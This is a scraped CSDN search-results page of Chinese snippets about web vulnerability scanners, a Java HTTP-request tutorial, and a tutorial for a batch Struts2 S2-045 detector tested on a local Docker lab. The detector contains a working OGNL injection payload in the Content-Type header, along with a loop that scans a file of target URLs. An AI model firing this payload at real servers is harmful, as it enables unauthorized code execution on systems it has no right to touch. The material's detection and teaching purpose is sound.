精华内容
下载资源
问答
  • remote-method- guesser ( rmg )是用Java编写的命令行实用程序,可用于识别Java RMI端点上的安全漏洞。 当前,支持以下操作: 列出可用的绑定名称及其对应的接口类名​​称 列出代码库位置(如果由远程服务器公开...
  • xss漏洞扫描工具

    热门讨论 2012-03-12 20:48:25
    它可以分析使用HTTP和HTTPS协议进行通信的应用程序,可以最简单地形式记录它观察的会话,并允许操作人员以各种方 式观查会话。如果你需要观察一个基于HTTP(S)应用程序的运行状态,可以满足你这种需要。不管是帮助...
  • JWebScan,Java版网站漏洞扫描
  • 十大Web网站漏洞扫描程序工具 1. Nikto 这是一个开源的Web服务器扫描程序,它可以对Web服务器的多种项目(包括3500个潜在的危险文件/CGI,以及超过900个服务器版本,还有250 多个服务器上的版本特定问题)进行全面的...

    十大Web网站漏洞扫描程序工具

    1. Nikto

    这是一个开源的Web服务器扫描程序,它可以对Web服务器的多种项目(包括3500个潜在的危险文件/CGI,以及超过900个服务器版本,还有250 多个服务器上的版本特定问题)进行全面的测试。其扫描项目和插件经常更新并且可以自动更新(如果需要的话)。

    Nikto可以在尽可能短的周期内测试你的Web服务器,这在其日志文件中相当明显。不过,如果你想试验一下(或者测试你的IDS系统),它也可以支持 LibWhisker的反IDS方法。

    不过,并非每一次检查都可以找出一个安全问题,虽然多数情况下是这样的。有一些项目是仅提供信息(“info only” )类型的检查,这种检查可以查找一些并不存在安全漏洞的项目,不过Web管理员或安全工程师们并不知道。这些项目通常都可以恰当地标记出来。为我们省去不少麻烦。

    2. Paros proxy

    这是一个对Web应用程序的漏洞进行评估的代理程序,即一个基于Java的web代理程序,可以评估Web应用程序的漏洞。它支持动态地编辑/查看 HTTP/HTTPS,从而改变cookies和表单字段等项目。它包括一个Web通信记录程序,Web圈套程序(spider),hash 计算器,还有一个可以测试常见的Web应用程序攻击(如SQL注入式攻击和跨站脚本攻击)的扫描器。

    3. WebScarab:

    它可以分析使用HTTP 和HTTPS协议进行通信的应用程序,WebScarab可以用最简单地形式记录它观察的会话,并允许操作人员以各种方式观查会话。如果你需要观察一个基于HTTP(S)应用程序的运行状态,那么WebScarabi就可以满足你这种需要。不管是帮助开发人员调试其它方面的难题,还是允许安全专业人员识别漏洞,它都是一款不错的工具。

    4. WebInspect:

    这是一款强大的Web应用程序扫描程序。SPI Dynamics的这款应用程序安全评估工具有助于确认Web应用中已知的和未知的漏洞。它还可以检查一个Web服务器是否正确配置,并会尝试一些常见的 Web攻击,如参数注入、跨站脚本、目录遍历攻击(directory traversal)等等。

    5. Whisker/libwhisker :

    Libwhisker是一个Perla模块,适合于HTTP测试。它可以针对许多已知的安全漏洞,测试HTTP服务器,特别是检测危险CGI的存在。 Whisker是一个使用libwhisker的扫描程序。

    6. Burpsuite:

    这是一个可以用于攻击Web应用程序的集成平台。Burp套件允许一个攻击者将人工的和自动的技术结合起来,以列举、分析、攻击Web应用程序,或利用这些程序的漏洞。各种各样的burp工具协同工作,共享信息,并允许将一种工具发现的漏洞形成另外一种工具的基础。

    7. Wikto:

    可以说这是一个Web服务器评估工具,它可以检查Web服务器中的漏洞,并提供与Nikto一样的很多功能,但增加了许多有趣的功能部分,如后端 miner和紧密的Google集成。它为MS.NET环境编写,但用户需要注册才能下载其二进制文件和源代码。

    8. Acunetix Web Vulnerability Scanner :

    这是一款商业级的Web漏洞扫描程序,它可以检查Web应用程序中的漏洞,如SQL注入、跨站脚本攻击、身份验证页上的弱口令长度等。它拥有一个操作方便的图形用户界面,并且能够创建专业级的Web站点安全审核报告。

    9. Watchfire AppScan:

    这也是一款商业类的Web漏洞扫描程序。AppScan在应用程序的整个开发周期都提供安全测试,从而测试简化了部件测试和开发早期的安全保证。它可以扫描许多常见的漏洞,如跨站脚本攻击、HTTP响应拆分漏洞、参数篡改、隐式字段处理、后门/调试选项、缓冲区溢出等等。

    10. N-Stealth:

    N-Stealth是一款商业级的Web服务器安全扫描程序。它比一些免费的Web扫描程序,如Whisker/libwhisker、 Nikto等的升级频率更高,它宣称含有“30000个漏洞和漏洞程序”以及“每天增加大量的漏洞检查”,不过这种说法令人质疑。还要注意,实际上所有通用的VA工具,如Nessus, ISS Internet Scanner, Retina, SAINT, Sara等都包含Web 扫描部件。(虽然这些工具并非总能保持软件更新,也不一定很灵活。)N-Stealth主要为Windows平台提供扫描,但并不提供源代码。

    漏洞扫描

    DZ 7.2爆路径0day mysql+IIS+PHP配置

    展开全文
  • 1.文件读取和漏洞检测工具类: import java.io.BufferedReader; import java.io.File; import java.io.FileReader; import java.io.IOException; import java.util.ArrayList; import java.util.HashMap; import ...

    第一步准备方法

    1.文件读取和漏洞检测工具类:

    
    import java.io.BufferedReader;
    import java.io.File;
    import java.io.FileReader;
    import java.io.IOException;
    import java.util.ArrayList;
    import java.util.HashMap;
    import java.util.List;
    import java.util.Map;
    
    /**
     * 工具类
     *
     */
    public class Utils {
    
        /**
         * 读取文件
         * 
         * @param filePath 文件路径
         * @return 返回待检测目标集合
         */
        public static List<String> readFile(String filePath) {
            List<String> target = new ArrayList<>(); // 待检测目标
            File file = new File(filePath); // 读取文件File
    
            if (!file.exists() || file.isDirectory()) {
                throw new RuntimeException("请检查文件是否存在或路径为文件!");
            }
    
            try {
                FileReader fileReader = new FileReader(file);
                BufferedReader reader = new BufferedReader(fileReader);
                String line = null;
                while ((line = reader.readLine()) != null) {
                    target.add(line);
                }
            } catch (IOException e) {
                System.err.println("读取文件异常!");
                // e.printStackTrace();
            }
    
            return target;
        }
    
        /**
         * 漏洞检测方法
         * 
         * @param target 目标
         * 
         */
        public void str045(String target) {
            String payload = "%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))."
                    + "(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('exist045')).(#o.close())}";
    
            Map<String, String> headers = new HashMap<>();
            headers.put("User-Agent",
                    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36");
            headers.put("Content-Type", payload);
    
            String postResponseBody = Req.sendPost(target, "", headers); // 请求的方法还是上节课的方法
            if (postResponseBody.contains("exist045")) {
                System.out.println("[*] exist st2-045: " + target);
            }
        }
    
    }
    

    接下来我们只差一个够把上面这些方法组合起来的主类了!

    第二步主类完善

    import java.util.List;
    
    public class Main {
    
        public static void main(String[] args) {
            String filePath = ""; // 文件路径
            List<String>  target = Utils.readFile(filePath); // 待扫描目标
            for (String t : target) {
                Utils.str045(t); // 检测漏洞
            }
    
        }
    
    }
    

    当然我们这样只能在开发工具中的使用,我们可能希望打包成jar,随时使用!
    那么我们先改造一下程序主类,让它能够接收到参数!

    
    import java.util.List;
    
    public class Main {
    
        public static void main(String[] args) {
            if (args.length == 0) {
                System.out.println("usage: java -jar struts2Detection.jar --file=target.txt");
                return;
            }
    
            String filePath = ""; // 文件路径
            for (String string : args) {
                int len = string.indexOf("--file=");
                if (len > -1) {
                    filePath = string.substring(len + 7, string.length());
                    System.out.println("filePath=" + filePath);
                    break;
                }
            }
    
            List<String> target = Utils.readFile(filePath); // 待扫描目标
            for (String t : target) {
                Utils.str045(t); // 检测漏洞
            }
    
        }
    }
    
    

    下面说下导出成jar的过程:
    对项目右键 - Export - Java - JAR file
    然后选择导出路径

    在经过两次Next之后,会来到一处让我们选择程序入口类,也就是存在Main函数的类,选择之后点击Finish即可!

    使用过程

    ————————————————
    版权声明:本文为CSDN博主「immortalityWang」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
    原文链接:https://blog.csdn.net/immortalityWang/article/details/81489545

    欢迎访问作者个人技术博客:BlackvonCode(www.blackvon.top)
    作者的微信公众号和小程序
    BlackvonCode

    展开全文
  • 漏洞扫描工具汇总

    2021-07-19 14:39:00
    下面就介绍几种常用的漏洞扫描工具。 Fortify 代码审计工具Fortify SCA (Fortify Static Code Analyzer),一款软件代码安全测试工具,提供静态源码扫描能力,包含了五大引擎分析系统:语义、结构、数据流、控制流、...

    漏洞扫描器可以快速帮助我们发现漏洞,如SQL注入漏洞、CSRF、缓冲区溢出等。下面就介绍几种常用的漏洞扫描工具。

    Fortify

    代码审计工具Fortify SCA (Fortify Static Code Analyzer),一款软件代码安全测试工具,提供静态源码扫描能力,包含了五大引擎分析系统:语义、结构、数据流、控制流、配置流。分析的过程中与特有的软件安全漏洞规则集进行全面的匹配、查找,从而将源代码中存在的安全漏洞扫描出来,并生成报告。
    Fortify软件是收费的,如果个人使用可以看看有无破解版,软件使用的规则安装在Core\config\rules。
    软件使用步骤如下图:
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    Burp Suite

    Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。

    模块描述
    Proxy拦截浏览器的http会话内容,给其他模块功能提供数据
    Target站点地图,主要显示信息,如:会默认记录浏览器访问的所有页面,使用Spider模块扫描后,可以再此看到爬虫所爬行的页面及每个页面的请求头和响应信息。
    Spider网络爬虫,能完整的枚举应用程序的内容和功能。
    Scanner帮助测试人员发现web应用程序的安全漏洞。
    Intruder高度可配置的工具,最重要的是配置Attack Type、程序变量以及字典,可以对web应用程序进行自动化攻击
    Decoder解码器,支持对URL、HEX、HTML等格式字符进行编码或解码。
    Comparer字符串比较器,可以快速发现两段字符串中的差异。
    RepeaterHTTP请求编辑工具。
    其他自带解决中文乱码、恢复默认选项、使用插件功能

    安装和简单使用可以参考:https://www.cnblogs.com/zewutest/p/13895187.html

    AWVS

    自动化的web应用程序安全测试工具,可以扫描任何通过web浏览器访问的和遵循HTTP/HTTPS规则的web站点和应用。

    AppScan

    AppScan是IBM的一款web应用安全测试工具,能扫描和检测所有常见的 Web 应用安全漏洞,例如 SQL 注入(SQL-injection)、跨站点脚本攻击(cross-site scripting)、缓冲区溢出(buffer overflow)及最新的 Flash/Flex 应用及 Web 2.0 应用曝露等方面安全漏洞的扫描。

    DependencyCheck

    Dependency-Check是OWASP(Open Web Application Security Project)的一个实用开源程序,用于识别项目依赖项并检查是否存在任何已知的,公开披露的漏洞。目前,已支持Java、.NET、Ruby、PHP、Node.js、Python等语言编写的程序,并为C/C++构建系统(autoconf和cmake)提供了有限的支持。而且该工具还是OWASP Top 10的解决方案的一部分。
    工具链接:https://github.com/jeremylong/DependencyCheck
    使用命令:

    ./cli/target/release/bin/dependency-check.sh -h
    ./cli/target/release/bin/dependency-check.sh  --project example --out . --scan ./src/test/resources
    

    SonarQube

    一款静态代码质量分析工具,支持Java、Python、PHP、JavaScript、CSS等25种以上的语言,而且能够集成在IDE、Jenkins、Git等服务中,方便随时查看代码质量分析报告。
    下载地址:https://www.sonarqube.org/downloads/,安装、配置及使用网上有很多教程和方案,可自行Google或百度。

    总结

    这些工具有的自己使用过,有的只是总结一下,仅供参考。后续如果遇到新的漏洞分析和扫描工具,再继续补充,欢迎读者给予补充和建议。

    展开全文
  • 今天是java编写漏洞扫描工具系列一,在整个系列中我将以案例驱动方式进行,从基本的请求,到常规漏洞扫描,Burp插件,调用SQLmap api,整合burp+sqlmap(Web平台),漏洞扫描平台(漏洞平台支持被动主动扫描,插件式...

    今天是java编写漏洞扫描工具系列一,在整个系列中我将以案例驱动方式进行,从基本的请求,到常规漏洞扫描,Burp插件,调用SQLmap api,整合burp+sqlmap(Web平台),漏洞扫描平台(漏洞平台支持被动主动扫描,插件式集成支持python插件)。
    我的开发环境为: eclipse + jdk 1.8

    在Web端下,基本上就是GET/POST请求,大部分漏洞的利用也是如此。将我们手工操作的流程-过程用代码是模拟的过程就是编写漏洞扫描工具.

    漏洞扫描工具可以帮助我们减少重复性的手工操作,并且效率极大的提高。人工操作10分钟,电脑零点几秒就可以完成,在对目标非常多的情况下,扫描工具更是必不可缺。但是工具毕竟是工具,它不可能像人脑一样的分析处理判断事物,所以工具会有误报和漏报的情况下。

    当然还有一些漏洞甚至是工具无法完成的,比如逻辑漏洞,逻辑漏洞名 “逻辑” 意思就是说开发者思维上的漏洞, 从一个开发者没有没有想到的角度去出发,但是可以做到和正常角度出发达到同样的目的,就是思考上的缺陷。这个智能的过程很明显是工具无法完成,但是要知道从你打开一个链接到接收到响应显示到页面上,中间可能会发生n多个请求。更别说频繁浏览网页的情况下,所以我们仍然可以编写一些针对性的扫描工具,来对请求进行筛选,得到我们最想看到的请求信息.

    好了,作为系列课程的第一部分,我们先从最基础GET/POST请求说起!
    先看下,使用java的API发出一个GET AND POST 请求
    GET 请求 :

    /**
         * GET请求
         * 
         * @param target 网址
         * @return
         */
        public static String sendGet(String target) {
            StringBuilder responseBody = new StringBuilder(); // 请求的响应内容
            BufferedReader reader;
            try {
                URL url = new URL(target); //java.net.URL类,解析URL
                URLConnection openConnection = url.openConnection(); // 打开连接,返回URLConnection实例
                // 获得服务端响应输入流,并将请求内容逐行追加到responseBody
                reader = new BufferedReader(new InputStreamReader(openConnection.getInputStream()));
                String line = null;
                while ((line = reader.readLine()) != null) {
                    // System.out.println(line); // 逐行打印请求
                    responseBody.append(line +"\r\n");
                }
            } catch (MalformedURLException e) {
                e.printStackTrace();
            } catch (IOException e) {
                e.printStackTrace();
            }
    
            return responseBody.toString();
        }
    
    

    POST 请求:

    /**
         * POST请求
         * @param target 网址
         * @param params 参数
         * @return
         */
        public static String sendPost(String target, String params) {
            StringBuilder responseBody = new StringBuilder(); // 请求的响应内容
            BufferedReader reader;
            PrintWriter out; // 输出流
            try {
                URL url = new URL(target);
                URLConnection openConnection = url.openConnection();
                openConnection.setDoInput(true); // 默认为true,可以使用openConnection.getInputStream() 取得响应
                openConnection.setDoOutput(true); // 默认为false, 设置为true后可以使用openConnection.getOutputStream() 进行写入数据
                out = new PrintWriter(openConnection.getOutputStream());
                out.print(params);
                out.flush();
    
                reader = new BufferedReader(new InputStreamReader(openConnection.getInputStream()));
                String line = null;
                while ((line = reader.readLine()) != null) {
                    // System.out.println(line); // 逐行打印请求
                    responseBody.append(line +"\r\n");
                }
            } catch (MalformedURLException e) {
                e.printStackTrace();
            } catch (IOException e) {
                e.printStackTrace();
            }
    
            return responseBody.toString();
        }
    
    

    执行测试:

    @Test
        void testRequest() {
            System.out.println("GET请求:");
            String getTarget = "https://www.baidu.com/";
            String getResponseBody = Req.sendGet(getTarget);
            System.out.println(getResponseBody);
    
            System.out.println("POST请求:");
            String postTarget = "http://127.0.0.1:9999/user/checkLogin.do";
            String params = "account=admin&password=admin";
            String postResponseBody = Req.sendPost(postTarget, params);
            System.out.println(postResponseBody);
        }
    

    有了以上的概念和认识后,我们实际编写一个案例,开发一个检测Struts2-045命令执行的检测工具,因为是st2-045漏洞是因为使用Jakarta上传文件对Content-Type判断和处理不档引起的,所以漏洞利用的poc是要作用在请求头中的Centent-Type才能生效的。所以我们需要在小小的修改一下post请求.

    /**
         * Post请求
         * @param target 网址
         * @param params 参数
         * @param headers 请求头
         * @return
         */
        public static String sendPost(String target, String params, Map<String, String> headers) {
            StringBuilder responseBody = new StringBuilder(); // 请求的响应内容
            BufferedReader reader;
            PrintWriter out; // 输出流
            try {
                URL url = new URL(target);
                URLConnection openConnection = url.openConnection();
                // 设置请求头
                for (Map.Entry<String, String> entry : headers.entrySet()) {
                    openConnection.setRequestProperty(entry.getKey(), entry.getValue());
                }
                openConnection.setDoInput(true); // 默认为true,可以使用openConnection.getInputStream() 取得响应
                openConnection.setDoOutput(true); // 默认为false, 设置为true后可以使用openConnection.getOutputStream() 进行写入数据
                out = new PrintWriter(openConnection.getOutputStream());
                out.print(params);
                out.flush();
    
                reader = new BufferedReader(new InputStreamReader(openConnection.getInputStream()));
                String line = null;
                while ((line = reader.readLine()) != null) {
                    // System.out.println(line); // 逐行打印请求
                    responseBody.append(line + "\r\n");
                }
            } catch (MalformedURLException e) {
                e.printStackTrace();
            } catch (IOException e) {
                e.printStackTrace();
            }
    
            return responseBody.toString();
    
        }
    

    测试用例:
    我们的payload使用ognl向页面打印(println)了一个 “exist045”,所以当 “exist045”存在于响应中的情况下,基本上可以判判断存在漏洞!

    @Test
        void str045() {
            String target = "http://demo.com/index.action";
            String payload = "%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))."
                    + "(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('exist045')).(#o.close())}";
    
            Map<String, String> headers = new HashMap<>();
            headers.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36");
            headers.put("Content-Type", payload);
    
            String postResponseBody = Req.sendPost(target, "",headers);
            if (postResponseBody.contains("exist045")) {
                System.out.println("[*] exist st2-045: "+target);
            }
        }
    

    后节:
    测试用例都是本地搭建的环境的,并非随意攻击,所以也需注意,本次使用的环境是使用docker的str2漏洞镜像。为了方便大家测试,现在来说一下如果构建测试用例。
    我使用的环境是centos-7 + docker 1.8
    在这里我推荐大家学习和使用linux和docker,使用docker的优点就在于快速部署,如果正常要搭建一个struts2漏洞的测试环境,我们需要安装jdk,tomcat,下载存在漏洞版本的struts2。经过一步步的繁杂操作后,才能运行起来环境,而使用docker的情况下,搭建环境只要docker pull xxx镜像即可,拉取回来。运行也是一句命令的事情,不会出现因为环境或者其他原因发生各种意外的情况浪费大量时间去解决这些问题。
    如何安装docker请参考:

    https://www.cnblogs.com/yufeng218/p/8370670.html

    本次使用的用例是在hub.docker找到的一个镜像:

    https://hub.docker.com/r/piesecurity/apache-struts2-cve-2017-5638/

    复制命令到安装有docker的机器上执行即可.
    pull 拉取镜像:

    [root@host ~]# docker pull piesecurity/apache-struts2-cve-2017-5638

    查看所有的docker镜像:

    docker images

    运行docker镜像:

    -d 指定容器运行与前台还是后台,默认为false
    -p 映射端口8080
    (e1440048c3f7 为 IMAGE ID)
    docker run -d -p 8080:8080 --name st2vuln e1440048c3f7

    运行之后查看当前所有运行着的镜像:
    docker ps

    现在就可以通过ip:8080访问这个镜像了!

    ————————————————
    版权声明:本文为CSDN博主「immortalityWang」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
    原文链接:https://blog.csdn.net/immortalityWang/article/details/81368387

    欢迎访问作者个人技术博客:BlackvonCode(www.blackvon.top)
    作者的微信公众号和小程序
    BlackvonCode

    展开全文
  • JAVA性能瓶颈和漏洞检测工具
  • Trivy是一种适用于CI的简单而全面的容器漏洞扫描程序。软件漏洞是指软件或操作系统中存在的故障、缺陷或弱点。Trivy检测操作系统包(Alpine、RHEL、CentOS等)和应用程序依赖(Bundler、Composer、npm、yarn等)的...
  • Acunetix网络漏洞扫描软件检测您网络的安全性软件介绍: Acunetix开创web应用程序安全扫描技术: 早在1997年Acunetix工程师就已关注网络安全并成为网络站点分析和漏洞检测方面的编程领导者。多达70 %的网站有漏洞,...
  • IronWasp Web应用程序漏洞扫描

    千次阅读 2016-07-28 19:16:13
    哎呀,web漏洞太多导致服务器老是被攻击,看来有效的测试对程序还是至关重要的!!!web程序是写的一个小项目:在javaphp的语法,比如$empty,$_get,$_post,$_file,这是非常有意思的,作者也曾经在javajs,这...
  • 现在有许多消息令我们感到Web的危险性,如《看Web如何摧毁你的企业》...扫描程序可以在帮助造我们造就安全的Web站点上助一臂之力,也就是说在黑客“黑”你之前,先测试一下自己系统中的漏洞。我们在此推荐10大Web漏...
  • Java静态扫描工具

    2010-06-01 10:43:09
    今天Java静态扫描工具1.2.0终于发布了。  Findbugs是一款JAVA代码静态分析器,能够在程序不运行的情况下扫描class文件。 扫描的过程中对被扫描的文件进行智能的分析,判断是否存在某些潜在的bug.如果 扫描...
  • 在CSDN上没有找到,所以将别处下载的上传过来,必须免费分享! 包括两个程序,代码尚未调试,希望有所借鉴。 代码仅供学习交流,切勿行危害安全之事,务必遵守法律法规!
  • 之前过的Nxpose和Nessus都是商用工具,花费不菲,使用免费community版本时使用功能又会有所缺失。因此我们还可以选用一个很好的开源工具,也就是Openvas加以利用。 首先在使用Openvas之前我就遇到了一个不小的麻烦...
  • 2020 年漏洞扫描工具 TOP10

    千次阅读 2020-09-30 17:00:00
    在本文中,我们将介绍市场上可用的十大优秀漏洞扫描工具。OpenVASTripwire IP360NessusComodo HackerProofNexpose communityVuln...
  • 工具:将代码覆盖率标记添加到生成的字节码中以实现代码覆盖率 测试覆盖率:运行JUnit单元测试并生成代码覆盖率数据(首先需要仪器) coverage-report:在reports /目录中以HTML和XML创建代码覆盖率报告。 蚂蚁...
  • 10大Web漏洞扫描工具

    2020-05-17 18:02:41
    推荐10大Web漏洞扫描程序 Nikto 这是一个开源的Web服务器扫描程序,它可以对Web服务器的多种项目(包括3500个潜在的危险文件/CGI,以及超过900个服务器版本,还有250多个服务器上的版本特定问题)进行全面的测试。其...
  • 一个比较常见的漏扫工具,可以作为安全测试过程中的初步验证工具使用,不建议依赖此工具的结果,报告可读性差一些,可以结合多个平台的结果来进行正式的测试结果分析。 安装: 官网:可以选择官网下载,简单直白的...
  • 很多受欢迎的网站都曾遭到过黑客入侵而蒙受经济损失,web 漏洞扫描器是一种软件程序,可在 Web 应用程序上执行自动黑盒测试并识别安全漏洞扫描程序不访问源代码,只执行功能测试并尝试查找安全漏洞。在这篇文章中...
  • 免费开源漏洞扫描工具+商业级

    千次阅读 2018-08-17 11:32:41
    Scanv 国内著名的商业级在线漏洞扫描。可以长期关注,经常会有免费活动。SCANV具备自动探测发现无主资产、僵尸资产的...支持系统漏洞扫描和web漏洞扫描。涵括CVE、OWASP各种漏洞类型,上千种检测策略。支持多种网站...
  • 它可以从任何Android设备扫描Web应用程序漏洞。一些功能可以根据测试人员的需要进行定制。 Droid10 是一个基于手持系统(android)的网络笔测试工具。 它可以从任何 Android 设备扫描 Web 应用程序错误。 世界正...
  • 十大Web漏洞扫描程序

    2009-12-01 17:26:00
    十大Web漏洞扫描程序1. Nikto 这是一个开源的Web服务器扫描程序,它可以对Web服务器的多种项目(包括3500个潜在的危险文件/CGI,以及超过900个服务器版本,还有250多个服务器上的版本特定问题)进行全面的测试。其...
  • Raptor是一个基于Web的(Web服务+ UI)以github为中心的源漏洞扫描程序,即,它仅使用github存储库URL扫描存储库。 您可以设置网络钩子,以确保每次提交或合并拉取请求时都进行自动扫描扫描是异步完成的,结果仅...
  • 10大Web漏洞扫描程序

    千次阅读 2014-06-25 13:01:16
    1.Nikto(免费产品)  Nikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描。... 一个基于Java的web代理程序,可以评估Web应用程序漏洞。它支持动态地编辑/查看HTTP/HTTPS,

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 10,941
精华内容 4,376
关键字:

java程序需要用什么工具扫描漏洞

java 订阅